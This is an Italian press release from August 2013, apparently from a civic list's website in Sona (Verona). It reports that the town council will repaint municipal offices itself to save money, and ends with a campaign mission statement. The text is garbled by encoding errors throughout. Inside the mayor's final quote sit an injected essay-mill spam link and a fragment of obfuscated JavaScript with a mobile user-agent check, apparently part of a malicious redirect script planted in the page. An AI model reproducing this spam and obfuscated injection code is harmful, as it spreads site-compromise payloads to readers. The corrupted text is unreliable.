Tempi di crisi, cosAi?? la giunta ridipinge da sAi?? gli uffici comunali.

COMUNICATO STAMPA

Sona, 30 Agosto 2013

Sona: tempi di crisi, cosAi?? la giunta ridipinge da sAi?? gli uffici comunali

Il bilancio piange e allora la Giunta comunale di Sona (Verona) prende pennelli e colore e, dal 30 agosto prossimo, ridipinge da sAi?? gli uffici comunali.

“Abbiamo preso questa decisione” spiega il sindaco Gianluigi Mazzi “dopo aver verificato il preventivo di spesa: troppe le migliaia di euro richieste, spese non piA? compatibili con le scarsitAi?? di fondi”.

“La spesa complessiva, che se affidata all’esterno superava i 3000 euro, si aggira intorno ai 200 euro acquistando noi il materiale – afferma il Sindaco – e il risparmio potrAi?? essere destinato ad opere piA? sensibili, come il sociale e la scuola. In tempi di crisi faremmo cosAi?? in tutte le nostre famiglie: perchAi?? non farlo in Comune?”

Sona A? un Comune del veronese di 18 mila abitanti la cui Amministrazione, composta da tre liste civiche, si A? insediata il 21 Giugno scorso. Entro il 30 Settembre prossimo l’Amministrazione dovrAi?? approvare il bilancio preventivo dell’anno 2013 ed A? proprio dalla verifica dei conti che sono nate le prime riflessioni sui risparmi.

“Come assessore al Bilancio – afferma Simone Caltagirone, che ricopre anche la funzione di Vice Sindaco – ho subito fatto presente la difficoltAi??: quello del taglio delle spese superflue A? un argomento ormai da tempo superato. Occorre fare di piA?: contribuire in modo attivo alle spese e quindi al benessere del Comune. Abbiamo pensato a tinteggiare noi stessi alcuni spazi comunali perchAi?? spesso sono impresentabili, per non parlare della sala Giunta che si presta ad ospitare i tanti matrimoni che si celebrano. Insomma, si tratta di partire letteralmente ridisegnando un nuovo Comune.”

La contribuzione alle spese nonchAi?? un diverso modo di vedere la “cosa pubblica” rappresentano le prioritAi?? di questa nuova Amministrazione. “Non c’A? piA? la possibilitAi?? di attingere al budget in modo passivo: – dice Gianmichele Bianco, Assessore alle Associazioni – occorre pensare ad un ruolo attivo di Associazioni e cittadini. Tutti devono sostenere il comune, inteso come “bene comune” e quindi bene di tutti noi. A partire da noi Amministratori. Questo A? l’esempio che conta”.

La Giunta, i consiglieri e i volontari si rimboccheranno le maniche dal 30 agosto per abbellire gli spazi del Comune. “Ma la nostra azione non si fermerAi?? qui – assicura ancora il Sindaco Mazzi Gianluigi -: altre iniziative seguiranno e tutti i risparmi saranno destinati dove piA? c’A? bisogno. Questo A? Teachers can use it for presentations, https://samedaypaper.org homework assignments, and study sessions. il nuovo modo di pensare al Comune, inteso in tutti i significati possibili.” (52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.